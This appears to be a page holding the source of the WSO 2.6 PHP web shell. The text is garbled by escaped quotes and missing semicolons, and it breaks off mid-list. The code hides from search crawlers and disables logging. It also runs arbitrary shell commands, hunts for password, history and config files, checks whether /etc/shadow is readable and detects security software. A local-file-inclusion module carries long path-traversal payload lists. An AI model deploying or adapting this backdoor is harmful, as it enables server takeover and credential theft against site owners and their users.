JACQUES LECLEAR

civ.php

session_start()
$password = \\\"\\\"
$passtype = \\\"\\\"
$color = \\\"#df5\\\"
$default_action = \\\'FilesMan\\\'
$default_use_ajax = true
$default_charset = \\\'Windows-1251\\\'
if(!empty($_SERVER[\\\'HTTP_USER_AGENT\\\'])) {
$userAgents = array(\\\"Google\\\",\\\"Slurp\\\",\\\"MSNBot\\\",\\\"ia_archiver\\\",\\\"Yandex\\\",\\\"Rambler\\\")
if(preg_match(\\\'/\\\'.implode(\\\'|\\\',$userAgents) .\\\'/i\\\',$_SERVER[\\\'HTTP_USER_AGENT\\\'])) {
header(\\\'HTTP/1.0 404 Not Found\\\')
exit
}}
@session_start()
@ini_set(\\\'error_log\\\',NULL)
@ini_set(\\\'log_errors\\\',0)
@ini_set(\\\'max_execution_time\\\',0)
@set_time_limit(0)
@define(\\\'WSO_VERSION\\\',\\\'2.6\\\')
@setcookie(\\\"wsog\\\",\\\"orb\\\",time()+3600*24*7)
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ?array_map(\\\'WSOstripslashes\\\',$array) : stripslashes($array)
}
$_POST = WSOstripslashes($_POST)
}
$dir = md5(\\\'/home/k3030889/public_html/media/temp/30b2c088dc63ae3e97ca260cb16a6c68.txt\\\' )
if(!empty($password) and $password !== 0) {
if (isset($_POST[\\\'pass\\\'])) {
if ($passtype == \\\"MD5\\\") {
$visitorpassword = md5($_POST[\\\'pass\\\'])}
elseif ($passtype == \\\"SHA1\\\") {
$visitorpassword = sha1($_POST[\\\'pass\\\'])}
else {
$visitorpassword = $_POST[\\\'pass\\\']}
if($visitorpassword == $password){
$_SESSION[$dir] = \\\"OK\\\"}
}
if ( !isset($_SESSION[$dir]) ||($_SESSION[$dir] != \\\"OK\\\") ) {
die(\\\"

Password:

\\\")}
}
elseif ($password == 0) {
$_SESSION[$dir] = \\\"OK\\\"
}
if(strtolower(substr(PHP_OS,0,3)) == \\\"win\\\")
$os = \\\'win\\\'
else
$os = \\\'nix\\\'
$safe_mode = @ini_get(\\\'safe_mode\\\')
if(!$safe_mode)
error_reporting(0)
$disable_functions = @ini_get(\\\'disable_functions\\\')
$home_cwd = @getcwd()
if(isset($_POST[\\\'c\\\']))
@chdir($_POST[\\\'c\\\'])
$cwd = @getcwd()
if($os == \\\'win\\\') {
$home_cwd = str_replace(\\\"\\\\\\\\\\\",\\\"/\\\",$home_cwd)
$cwd = str_replace(\\\"\\\\\\\\\\\",\\\"/\\\",$cwd)
}
if( $cwd[strlen($cwd)-1] != \\\'/\\\')
$cwd .= \\\'/\\\'
if(!isset($_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']) .\\\'ajax\\\']))
$_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']) .\\\'ajax\\\'] = (bool)$GLOBALS[\\\'default_use_ajax\\\']
if($os == \\\'win\\\')
$aliases = array(
\\\"List Directory\\\"=>\\\"dir\\\",
\\\"Find index.php in current dir\\\"=>\\\"dir /s /w /b index.php\\\",
\\\"Find *config*.php in current dir\\\"=>\\\"dir /s /w /b *config*.php\\\",
\\\"Show active connections\\\"=>\\\"netstat -an\\\",
\\\"Show running services\\\"=>\\\"net start\\\",
\\\"User accounts\\\"=>\\\"net user\\\",
\\\"Show computers\\\"=>\\\"net view\\\",
\\\"ARP Table\\\"=>\\\"arp -a\\\",
\\\"IP Configuration\\\"=>\\\"ipconfig /all\\\"
)
else
$aliases = array(
\\\"List dir\\\"=>\\\"ls -lha\\\",
\\\"list file attributes on a Linux second extended file system\\\"=>\\\"lsattr -va\\\",
\\\"show opened ports\\\"=>\\\"netstat -an | grep -i listen\\\",
\\\"process status\\\"=>\\\"ps aux\\\",
\\\"Find\\\"=>\\\"\\\",
\\\"find all suid files\\\"=>\\\"find / -type f -perm -04000 -ls\\\",
\\\"find suid files in current dir\\\"=>\\\"find . -type f -perm -04000 -ls\\\",
\\\"find all sgid files\\\"=>\\\"find / -type f -perm -02000 -ls\\\",
\\\"find sgid files in current dir\\\"=>\\\"find . -type f -perm -02000 -ls\\\",
\\\"find config.inc.php files\\\"=>\\\"find / -type f -name config.inc.php\\\",
\\\"find config* files\\\"=>\\\"find / -type f -name \\\\\\\"config*\\\\\\\"\\\",
\\\"find config* files in current dir\\\"=>\\\"find . -type f -name \\\\\\\"config*\\\\\\\"\\\",
\\\"find all writable folders and files\\\"=>\\\"find / -perm -2 -ls\\\",
\\\"find all writable folders and files in current dir\\\"=>\\\"find . -perm -2 -ls\\\",
\\\"find all service.pwd files\\\"=>\\\"find / -type f -name service.pwd\\\",
\\\"find service.pwd files in current dir\\\"=>\\\"find . -type f -name service.pwd\\\",
\\\"find all .htpasswd files\\\"=>\\\"find / -type f -name .htpasswd\\\",
\\\"find .htpasswd files in current dir\\\"=>\\\"find . -type f -name .htpasswd\\\",
\\\"find all .bash_history files\\\"=>\\\"find / -type f -name .bash_history\\\",
\\\"find .bash_history files in current dir\\\"=>\\\"find . -type f -name .bash_history\\\",
\\\"find all .fetchmailrc files\\\"=>\\\"find / -type f -name .fetchmailrc\\\",
\\\"find .fetchmailrc files in current dir\\\"=>\\\"find . -type f -name .fetchmailrc\\\",
\\\"Locate\\\"=>\\\"\\\",
\\\"locate httpd.conf files\\\"=>\\\"locate httpd.conf\\\",
\\\"locate vhosts.conf files\\\"=>\\\"locate vhosts.conf\\\",
\\\"locate proftpd.conf files\\\"=>\\\"locate proftpd.conf\\\",
\\\"locate psybnc.conf files\\\"=>\\\"locate psybnc.conf\\\",
\\\"locate my.conf files\\\"=>\\\"locate my.conf\\\",
\\\"locate admin.php files\\\"=>\\\"locate admin.php\\\",
\\\"locate cfg.php files\\\"=>\\\"locate cfg.php\\\",
\\\"locate conf.php files\\\"=>\\\"locate conf.php\\\",
\\\"locate config.dat files\\\"=>\\\"locate config.dat\\\",
\\\"locate config.php files\\\"=>\\\"locate config.php\\\",
\\\"locate config.inc files\\\"=>\\\"locate config.inc\\\",
\\\"locate config.inc.php\\\"=>\\\"locate config.inc.php\\\",
\\\"locate config.default.php files\\\"=>\\\"locate config.default.php\\\",
\\\"locate config* files \\\"=>\\\"locate config\\\",
\\\"locate .conf files\\\"=>\\\"locate \\\'.conf\\\'\\\",
\\\"locate .pwd files\\\"=>\\\"locate \\\'.pwd\\\'\\\",
\\\"locate .sql files\\\"=>\\\"locate \\\'.sql\\\'\\\",
\\\"locate .htpasswd files\\\"=>\\\"locate \\\'.htpasswd\\\'\\\",
\\\"locate .bash_history files\\\"=>\\\"locate \\\'.bash_history\\\'\\\",
\\\"locate .mysql_history files\\\"=>\\\"locate \\\'.mysql_history\\\'\\\",
\\\"locate .fetchmailrc files\\\"=>\\\"locate \\\'.fetchmailrc\\\'\\\",
\\\"locate backup files\\\"=>\\\"locate backup\\\",
\\\"locate dump files\\\"=>\\\"locate dump\\\",
\\\"locate priv files\\\"=>\\\"locate priv\\\"
)
function wsoHeader() {
if(empty($_POST[\\\'charset\\\']))
$_POST[\\\'charset\\\'] = $GLOBALS[\\\'default_charset\\\']
global $color
echo \\\"
\\\".$_SERVER[\\\'HTTP_HOST\\\'] .\\\" - WSO \\\".WSO_VERSION .\\\"






 



\\\"
$freeSpace = @diskfreespace($GLOBALS[\\\'cwd\\\'])
$totalSpace = @disk_total_space($GLOBALS[\\\'cwd\\\'])
$totalSpace = $totalSpace?$totalSpace:1
$release = @php_uname(\\\'r\\\')
$kernel = @php_uname(\\\'s\\\')
if(!function_exists(\\\'posix_getegid\\\')) {
$user = @get_current_user()
$uid = @getmyuid()
$gid = @getmygid()
$group = \\\"?\\\"
}else {
$uid = @posix_getpwuid(posix_geteuid())
$gid = @posix_getgrgid(posix_getegid())
$user = $uid[\\\'name\\\']
$uid = $uid[\\\'uid\\\']
$group = $gid[\\\'name\\\']
$gid = $gid[\\\'gid\\\']
}
$cwd_links = \\\'\\\'
$path = explode(\\\"/\\\",$GLOBALS[\\\'cwd\\\'])
$n=count($path)
for($i=0$i$cwd_links .= \\\"\\\".$path[$i].\\\"/\\\"
}
$charsets = array(\\\'UTF-8\\\',\\\'Windows-1251\\\',\\\'KOI8-R\\\',\\\'KOI8-U\\\',\\\'cp866\\\')
$opt_charsets = \\\'\\\'
foreach($charsets as $item)
$opt_charsets .= \\\'\\\'.$item.\\\'\\\'
$m = array(\\\'Sec Info\\\'=>\\\'SecInfo\\\',\\\'Files\\\'=>\\\'FilesMan\\\',\\\'Exec\\\'=>\\\'Console\\\',\\\'Sql\\\'=>\\\'Sql\\\',\\\'PHP Tools\\\'=>\\\'phptools\\\',\\\'LFI\\\'=>\\\'lfiscan\\\',\\\'Php\\\'=>\\\'Php\\\',\\\'Safe mode\\\'=>\\\'SafeMode\\\',\\\'String tools\\\'=>\\\'StringTools\\\',\\\'XSS Shell\\\'=>\\\'XSSShell\\\',\\\'Bruteforce\\\'=>\\\'Bruteforce\\\',\\\'Network\\\'=>\\\'Network\\\')
if(!empty($GLOBALS[\\\'auth_pass\\\']))
$m[\\\'Logout\\\'] = \\\'Logout\\\'
$m[\\\'Self remove\\\'] = \\\'SelfRemove\\\'
$menu = \\\'\\\'
foreach($m as $k =>$v)
$menu .= \\\'[\\\'.$k.\\\']\\\'
$drives = \\\"\\\"
if($GLOBALS[\\\'os\\\'] == \\\'win\\\') {
foreach(range(\\\'c\\\',\\\'z\\\') as $drive)
if(is_dir($drive.\\\':\\\\\\\\\\\'))
$drives .= \\\'[ \\\'.$drive.\\\' ] \\\'
}
echo \\\'

\\\'.\\\'\\\'.\\\'
Uname:
User:
Php:
Hdd:
Cwd:\\\'.($GLOBALS[\\\'os\\\'] == \\\'win\\\'?\\\'
Drives:\\\':\\\'\\\') .\\\'
\\\'.substr(@php_uname(),0,120) .\\\'
\\\'.$uid .\\\' ( \\\'.$user .\\\' ) Group: \\\'.$gid .\\\' ( \\\'.$group .\\\' )
\\\'.@phpversion() .\\\' Safe mode: \\\'.($GLOBALS[\\\'safe_mode\\\']?\\\'ON\\\':\\\'OFF\\\')
.\\\' [ phpinfo ] Datetime: \\\'.date(\\\'Y-m-d H:i:s\\\') .\\\'
\\\'.wsoViewSize($totalSpace) .\\\' Free: \\\'.wsoViewSize($freeSpace) .\\\' (\\\'.(int) ($freeSpace/$totalSpace*100) .\\\'%)
\\\'.$cwd_links .\\\' \\\'.wsoPermsColor($GLOBALS[\\\'cwd\\\']) .\\\' [ home ]
\\\'.$drives .\\\'

Server IP:
\\\'.@$_SERVER[\\\"SERVER_ADDR\\\"] .\\\'
Client IP:
\\\'.$_SERVER[\\\'REMOTE_ADDR\\\'] .\\\'

\\\'
.\\\'

\\\'.$menu .\\\'
\\\'
}
function wsoFooter() {
$is_writable = is_writable($GLOBALS[\\\'cwd\\\'])?\\\" (Writeable)\\\":\\\" (Not writable)\\\"
echo \\\"

 

Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable

 

Execute:





Upload file:$is_writable

\\\"
}
if (!function_exists(\\\"posix_getpwuid\\\") &&(strpos($GLOBALS[\\\'disable_functions\\\'],\\\'posix_getpwuid\\\')===false)) {
function posix_getpwuid($p) {return false}}
if (!function_exists(\\\"posix_getgrgid\\\") &&(strpos($GLOBALS[\\\'disable_functions\\\'],\\\'posix_getgrgid\\\')===false)) {
function posix_getgrgid($p) {return false}}
function wsoEx($in) {
$out = \\\'\\\'
if (function_exists(\\\'exec\\\')) {
@exec($in,$out)
$out = @join(\\\"\\\\n\\\",$out)
}elseif (function_exists(\\\'passthru\\\')) {
ob_start()
@passthru($in)
$out = ob_get_clean()
}elseif (function_exists(\\\'system\\\')) {
ob_start()
@system($in)
$out = ob_get_clean()
}elseif (function_exists(\\\'shell_exec\\\')) {
$out = shell_exec($in)
}elseif (is_resource($f = @popen($in,\\\"r\\\"))) {
$out = \\\"\\\"
while(!@feof($f))
$out .= fread($f,1024)
pclose($f)
}
return $out
}
function wsoViewSize($s) {
if($s >= 1073741824)
return sprintf(\\\'%1.2f\\\',$s / 1073741824 ).\\\' GB\\\'
elseif($s >= 1048576)
return sprintf(\\\'%1.2f\\\',$s / 1048576 ) .\\\' MB\\\'
elseif($s >= 1024)
return sprintf(\\\'%1.2f\\\',$s / 1024 ) .\\\' KB\\\'
else
return $s .\\\' B\\\'
}
function wsoPerms($p) {
if (($p &0xC000) == 0xC000)$i = \\\'s\\\'
elseif (($p &0xA000) == 0xA000)$i = \\\'l\\\'
elseif (($p &0x8000) == 0x8000)$i = \\\'-\\\'
elseif (($p &0x6000) == 0x6000)$i = \\\'b\\\'
elseif (($p &0x4000) == 0x4000)$i = \\\'d\\\'
elseif (($p &0x2000) == 0x2000)$i = \\\'c\\\'
elseif (($p &0x1000) == 0x1000)$i = \\\'p\\\'
else $i = \\\'u\\\'
$i .= (($p &0x0100) ?\\\'r\\\': \\\'-\\\')
$i .= (($p &0x0080) ?\\\'w\\\': \\\'-\\\')
$i .= (($p &0x0040) ?(($p &0x0800) ?\\\'s\\\': \\\'x\\\') : (($p &0x0800) ?\\\'S\\\': \\\'-\\\'))
$i .= (($p &0x0020) ?\\\'r\\\': \\\'-\\\')
$i .= (($p &0x0010) ?\\\'w\\\': \\\'-\\\')
$i .= (($p &0x0008) ?(($p &0x0400) ?\\\'s\\\': \\\'x\\\') : (($p &0x0400) ?\\\'S\\\': \\\'-\\\'))
$i .= (($p &0x0004) ?\\\'r\\\': \\\'-\\\')
$i .= (($p &0x0002) ?\\\'w\\\': \\\'-\\\')
$i .= (($p &0x0001) ?(($p &0x0200) ?\\\'t\\\': \\\'x\\\') : (($p &0x0200) ?\\\'T\\\': \\\'-\\\'))
return $i
}
function wsoPermsColor($f) {
if (!@is_readable($f))
return \\\'\\\'.wsoPerms(@fileperms($f)) .\\\'\\\'
elseif (!@is_writable($f))
return \\\'\\\'.wsoPerms(@fileperms($f)) .\\\'\\\'
else
return \\\'\\\'.wsoPerms(@fileperms($f)) .\\\'\\\'
}
if(!function_exists(\\\"scandir\\\")) {
function scandir($dir) {
$dh = opendir($dir)
while (false !== ($filename = readdir($dh)))
$files[] = $filename
return $files
}
}
function wsoWhich($p) {
$path = wsoEx(\\\'which \\\'.$p)
if(!empty($path))
return $path
return false
}
function actionSecInfo() {
wsoHeader()
echo \\\'

 

Server security information

\\\'
function wsoSecParam($n,$v) {
$v = trim($v)
if($v) {
echo \\\'\\\'.$n .\\\': \\\'
if(strpos($v,\\\"\\\\n\\\") === false)
echo $v .\\\'
\\\'
else
echo \\\'
\\\'.$v .\\\'
\\\'
}
}
wsoSecParam(\\\'Server software\\\',@getenv(\\\'SERVER_SOFTWARE\\\'))
if(function_exists(\\\'apache_get_modules\\\'))
wsoSecParam(\\\'Loaded Apache modules\\\',implode(\\\', \\\',apache_get_modules()))
wsoSecParam(\\\'Disabled PHP Functions\\\',$GLOBALS[\\\'disable_functions\\\']?$GLOBALS[\\\'disable_functions\\\']:\\\'none\\\')
wsoSecParam(\\\'Open base dir\\\',@ini_get(\\\'open_basedir\\\'))
wsoSecParam(\\\'Safe mode exec dir\\\',@ini_get(\\\'safe_mode_exec_dir\\\'))
wsoSecParam(\\\'Safe mode include dir\\\',@ini_get(\\\'safe_mode_include_dir\\\'))
wsoSecParam(\\\'cURL support\\\',function_exists(\\\'curl_version\\\')?\\\'enabled\\\':\\\'no\\\')
$temp=array()
if(function_exists(\\\'mysql_get_client_info\\\'))
$temp[] = \\\"MySql (\\\".mysql_get_client_info().\\\")\\\"
if(function_exists(\\\'mssql_connect\\\'))
$temp[] = \\\"MSSQL\\\"
if(function_exists(\\\'pg_connect\\\'))
$temp[] = \\\"PostgreSQL\\\"
if(function_exists(\\\'oci_connect\\\'))
$temp[] = \\\"Oracle\\\"
wsoSecParam(\\\'Supported databases\\\',implode(\\\', \\\',$temp))
echo \\\'
\\\'
if($GLOBALS[\\\'os\\\'] == \\\'nix\\\') {
wsoSecParam(\\\'Readable /etc/passwd\\\',@is_readable(\\\'/etc/passwd\\\')?\\\"yes [view]\\\":\\\'no\\\')
wsoSecParam(\\\'Readable /etc/shadow\\\',@is_readable(\\\'/etc/shadow\\\')?\\\"yes [view]\\\":\\\'no\\\')
wsoSecParam(\\\'OS version\\\',@file_get_contents(\\\'/proc/version\\\'))
wsoSecParam(\\\'Distr name\\\',@file_get_contents(\\\'/etc/issue.net\\\'))
if(!$GLOBALS[\\\'safe_mode\\\']) {
$userful = array(\\\'gcc\\\',\\\'lcc\\\',\\\'cc\\\',\\\'ld\\\',\\\'make\\\',\\\'php\\\',\\\'perl\\\',\\\'python\\\',\\\'ruby\\\',\\\'tar\\\',\\\'gzip\\\',\\\'bzip\\\',\\\'bzip2\\\',\\\'nc\\\',\\\'locate\\\',\\\'suidperl\\\')
$danger = array(\\\'kav\\\',\\\'nod32\\\',\\\'bdcored\\\',\\\'uvscan\\\',\\\'sav\\\',\\\'drwebd\\\',\\\'clamd\\\',\\\'rkhunter\\\',\\\'chkrootkit\\\',\\\'iptables\\\',\\\'ipfw\\\',\\\'tripwire\\\',\\\'shieldcc\\\',\\\'portsentry\\\',\\\'snort\\\',\\\'ossec\\\',\\\'lidsadm\\\',\\\'tcplodg\\\',\\\'sxid\\\',\\\'logcheck\\\',\\\'logwatch\\\',\\\'sysmask\\\',\\\'zmbscap\\\',\\\'sawmill\\\',\\\'wormscan\\\',\\\'ninja\\\')
$downloaders = array(\\\'wget\\\',\\\'fetch\\\',\\\'lynx\\\',\\\'links\\\',\\\'curl\\\',\\\'get\\\',\\\'lwp-mirror\\\')
echo \\\'
\\\'
$temp=array()
foreach ($userful as $item)
if(wsoWhich($item))
$temp[] = $item
wsoSecParam(\\\'Userful\\\',implode(\\\', \\\',$temp))
$temp=array()
foreach ($danger as $item)
if(wsoWhich($item))
$temp[] = $item
wsoSecParam(\\\'Danger\\\',implode(\\\', \\\',$temp))
$temp=array()
foreach ($downloaders as $item)
if(wsoWhich($item))
$temp[] = $item
wsoSecParam(\\\'Downloaders\\\',implode(\\\', \\\',$temp))
echo \\\'
\\\'
wsoSecParam(\\\'HDD space\\\',wsoEx(\\\'df -h\\\'))
wsoSecParam(\\\'Hosts\\\',@file_get_contents(\\\'/etc/hosts\\\'))
}
}else {
wsoSecParam(\\\'OS Version\\\',wsoEx(\\\'ver\\\'))
wsoSecParam(\\\'Account Settings\\\',wsoEx(\\\'net accounts\\\'))
wsoSecParam(\\\'User Accounts\\\',wsoEx(\\\'net user\\\'))
}
echo \\\'

\\\'
wsoFooter()
}
function actionlfiscan() {
wsoHeader()
print \\\'

Led-Zeppelin\\\\\\\'s LFI File dumper


LFI URL: File:

httpd.conf

Error Log
php.ini
MySQL
FTP
Environ
Null:

No
User-Agent:
\\\'
error_reporting(0)
if($_POST[\\\'lfiurl\\\']) {
print \\\"

\\\"
$cheader = $_POST[\\\'custom_header\\\']
$target = $_POST[\\\'lfiurl\\\']
$type = $_POST[\\\'scantype\\\']
$byte1 = $_POST[\\\'null\\\']
$lfitest = \\\"../../../../../../../../../../../../../../etc/passwd\\\".$byte1.\\\"\\\"
$lfitest2 = \\\"../../../../../../../../../../../../../../fake/file\\\".$byte1.\\\"\\\"
$lfiprocenv = \\\"../../../../../../../../../../../../../../proc/environ\\\".$byte1.\\\"\\\"
$lfiaccess = array(
1 =>\\\"../../../../../../../../../../../../../../apache/logs/access.log\\\".$byte1.\\\"\\\",
2 =>\\\"../../../../../../../../../../../../../../etc/httpd/logs/acces_log\\\".$byte1.\\\"\\\",
3 =>\\\"../../../../../../../../../../../../../../etc/httpd/logs/acces.log\\\".$byte1.\\\"\\\",
4 =>\\\"../../../../../../../../../../../../../../var/www/logs/access_log\\\".$byte1.\\\"\\\",
5 =>\\\"../../../../../../../../../../../../../../var/www/logs/access.log\\\".$byte1.\\\"\\\",
6 =>\\\"../../../../../../../../../../../../../../usr/local/apache/logs/access_log\\\".$byte1.\\\"\\\",
7 =>\\\"../../../../../../../../../../../../../../usr/local/apache/logs/access.log\\\".$byte1.\\\"\\\",
8 =>\\\"../../../../../../../../../../../../../../var/log/apache/access_log\\\".$byte1.\\\"\\\",
9 =>\\\"../../../../../../../../../../../../../../var/log/apache2/access_log\\\".$byte1.\\\"\\\",
10 =>\\\"../../../../../../../../../../../../../../var/log/apache/access.log\\\".$byte1.\\\"\\\",
11 =>\\\"../../../../../../../../../../../../../../var/log/apache2/access.log\\\".$byte1.\\\"\\\",
12 =>\\\"../../../../../../../../../../../../../../var/log/access_log\\\".$byte1.\\\"\\\",
13 =>\\\"../../../../../../../../../../../../../../var/log/access.log\\\".$byte1.\\\"\\\",
14 =>\\\"../../../../../../../../../../../../../../var/log/httpd/access_log\\\".$byte1.\\\"\\\",
15 =>\\\"../../../../../../../../../../../../../../apache2/logs/access.log\\\".$byte1.\\\"\\\",
16 =>\\\"../../../../../../../../../../../../../../logs/access.log\\\".$byte1.\\\"\\\",
17 =>\\\"../../../../../../../../../../../../../../usr/local/apache2/logs/access_log\\\".$byte1.\\\"\\\",
18 =>\\\"../../../../../../../../../../../../../../usr/local/apache2/logs/access.log\\\".$byte1.\\\"\\\",
19 =>\\\"../../../../../../../../../../../../../../var/log/httpd/access.log\\\".$byte1.\\\"\\\",
20 =>\\\"../../../../../../../../../../../../../../opt/lampp/logs/access_log\\\".$byte1.\\\"\\\",
21 =>\\\"../../../../../../../../../../../../../../opt/xampp/logs/access_log\\\".$byte1.\\\"\\\",
22 =>\\\"../../../../../../../../../../../../../../opt/lampp/logs/access.log\\\".$byte1.\\\"\\\",
23 =>\\\"../../../../../../../../../../../../../../opt/xampp/logs/access.log\\\".$byte1.\\\"\\\")
$lfierror = array(
1 =>\\\"../../../../../../../../../../../../../../apache/logs/error.log\\\".$byte1.\\\"\\\",
2 =>\\\"../../../../../../../../../../../../../../etc/httpd/logs/error_log\\\".$byte1.\\\"\\\",
3 =>\\\"../../../../../../../../../../../../../../etc/httpd/logs/error.log\\\".$byte1.\\\"\\\",
4 =>\\\"../../../../../../../../../../../../../../var/www/logs/error_log\\\".$byte1.\\\"\\\",
5 =>\\\"../../../../../../../../../../../../../../var/www/logs/error.log\\\".$byte1.\\\"\\\",
6 =>\\\"../../../../../../../../../../../../../../usr/local/apache/logs/error_log\\\".$byte1.\\\"\\\",
7 =>\\\"../../../../../../../../../../../../../../usr/local/apache/logs/error.log\\\".$byte1.\\\"\\\",
8 =>\\\"../../../../../../../../../../../../../../var/log/apache/error_log\\\".$byte1.\\\"\\\",
9 =>\\\"../../../../../../../../../../../../../../var/log/apache2/error_log\\\".$byte1.\\\"\\\",
10 =>\\\"../../../../../../../../../../../../../../var/log/apache/error.log\\\".$byte1.\\\"\\\",
11 =>\\\"../../../../../../../../../../../../../../var/log/apache2/error.log\\\".$byte1.\\\"\\\",
12 =>\\\"../../../../../../../../../../../../../../var/log/error_log\\\".$byte1.\\\"\\\",
13 =>\\\"../../../../../../../../../../../../../../var/log/error.log\\\".$byte1.\\\"\\\",
14 =>\\\"../../../../../../../../../../../../../../var/log/httpd/error_log\\\".$byte1.\\\"\\\",
15 =>\\\"../../../../../../../../../../../../../../apache2/logs/error.log\\\".$byte1.\\\"\\\",
16 =>\\\"../../../../../../../../../../../../../../logs/error.log\\\".$byte1.\\\"\\\",
17 =>\\\"../../../../../../../../../../../../../../usr/local/apache2/logs/error_log\\\".$byte1.\\\"\\\",
18 =>\\\"../../../../../../../../../../../../../../usr/local/apache2/logs/error.log\\\".$byte1.\\\"\\\",
19 =>\\\"../../../../../../../../../../../../../../var/log/httpd/error.log\\\".$byte1.\\\"\\\",
20 =>\\\"../../../../../../../../../../../../../../opt/lampp/logs/error_log\\\".$byte1.\\\"\\\",
21 =>\\\"../../../../../../../../../../../../../../opt/xampp/logs/error_log\\\".$byte1.\\\"\\\",
22 =>\\\"../../../../../../../../../../../../../../opt/lampp/logs/error.log\\\".$byte1.\\\"\\\",
23 =>\\\"../../../../../../../../../../../../../../opt/xampp/logs/error.log\\\".$byte1.\\\"\\\")
$lficonfig = array(
1 =>\\\"../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf\\\".$byte1.\\\"\\\",
2 =>\\\"../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf\\\".$byte1.\\\"\\\",
3 =>\\\"../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf\\\".$byte1.\\\"\\\",
4 =>\\\"../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf\\\".$byte1.\\\"\\\",
5 =>\\\"../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf\\\".$byte1.\\\"\\\",
6 =>\\\"../../../../../../../../../../../../../../../etc/apache2/httpd.conf\\\".$byte1.\\\"\\\",
7 =>\\\"../../../../../../../../../../../../../../../usr/local/apache/httpd.conf\\\".$byte1.\\\"\\\",
8 =>\\\"../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf\\\".$byte1.\\\"\\\",
9 =>\\\"../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf\\\".$byte1.\\\"\\\",
10 =>\\\"../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf\\\".$byte1.\\\"\\\",
11 =>\\\"../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf\\\".$byte1.\\\"\\\",
12 =>\\\"../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf\\\".$byte1.\\\"\\\",
13 =>\\\"../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf\\\".$byte1.\\\"\\\",
14 =>\\\"../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf\\\".$byte1.\\\"\\\",
15 =>\\\"../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf\\\".$byte1.\\\"\\\",
16 =>\\\"../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf\\\".$byte1.\\\"\\\",
17 =>\\\"../../../../../../../../../../../../../../../etc/http/conf/httpd.conf\\\".$byte1.\\\"\\\",
18 =>\\\"../../../../../../../../../../../../../../../etc/httpd/httpd.conf\\\".$byte1.\\\"\\\",
19 =>\\\"../../../../../../../../../../../../../../../etc/http/httpd.conf\\\".$byte1.\\\"\\\",
20 =>\\\"../../../../../../../../../../../../../../../etc/httpd.conf\\\".$byte1.\\\"\\\",
21 =>\\\"../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf\\\".$byte1.\\\"\\\",
22 =>\\\"../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf\\\".$byte1.\\\"\\\",
23 =>\\\"../../../../../../../../../../../../../../../var/www/conf/httpd.conf\\\".$byte1.\\\"\\\",
24 =>\\\"../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf\\\".$byte1.\\\"\\\",
25 =>\\\"../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default\\\".$byte1.\\\"\\\",
26 =>\\\"../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf\\\".$byte1.\\\"\\\",
27 =>\\\"../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf\\\".$byte1.\\\"\\\",
28 =>\\\"../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default\\\".$byte1.\\\"\\\",
29 =>\\\"../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php\\\".$byte1.\\\"\\\",
30 =>\\\"../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php\\\".$byte1.\\\"\\\",
31 =>\\\"../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php\\\".$byte1.\\\"\\\",
32 =>\\\"../../../../../../../../../../../../../../../usr/local/php/httpd.conf\\\".$byte1.\\\"\\\",
33 =>\\\"../../../../../../../../../../../../../../../usr/local/php4/httpd.conf\\\".$byte1.\\\"\\\",
34 =>\\\"../../../../../../../../../../../../../../../usr/local/php5/httpd.conf\\\".$byte1.\\\"\\\",
35 =>\\\"../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf\\\".$byte1.\\\"\\\")
$lfiphpini = array(
1 =>\\\"../../../../../../../../../../../../../../../etc/php.ini\\\".$byte1.\\\"\\\",
2 =>\\\"../../../../../../../../../../../../../../../bin/php.ini\\\".$byte1.\\\"\\\",
3 =>\\\"../../../../../../../../../../../../../../../etc/httpd/php.ini\\\".$byte1.\\\"\\\",
4 =>\\\"../../../../../../../../../../../../../../../usr/lib/php.ini\\\".$byte1.\\\"\\\",
5 =>\\\"../../../../../../../../../../../../../../../usr/lib/php/php.ini\\\".$byte1.\\\"\\\",
6 =>\\\"../../../../../../../../../../../../../../../usr/local/etc/php.ini\\\".$byte1.\\\"\\\",
7 =>\\\"../../../../../../../../../../../../../../../usr/local/lib/php.ini\\\".$byte1.\\\"\\\",
8 =>\\\"../../../../../../../../../../../../../../../usr/local/php/lib/php.ini\\\".$byte1.\\\"\\\",
9 =>\\\"../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini\\\".$byte1.\\\"\\\",
10 =>\\\"../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini\\\".$byte1.\\\"\\\",
11 =>\\\"../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini\\\".$byte1.\\\"\\\",
12 =>\\\"../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini\\\".$byte1.\\\"\\\",
13 =>\\\"../../../../../../../../../../../../../../../etc/php4/apache/php.ini\\\".$byte1.\\\"\\\",
14 =>\\\"../../../../../../../../../../../../../../../etc/php4/apache2/php.ini\\\".$byte1.\\\"\\\",
15 =>\\\"../../../../../../../../../../../../../../../etc/php5/apache/php.ini\\\".$byte1.\\\"\\\",
16 =>\\\"../../../../../../../../../../../../../../../etc/php5/apache2/php.ini\\\".$byte1.\\\"\\\",
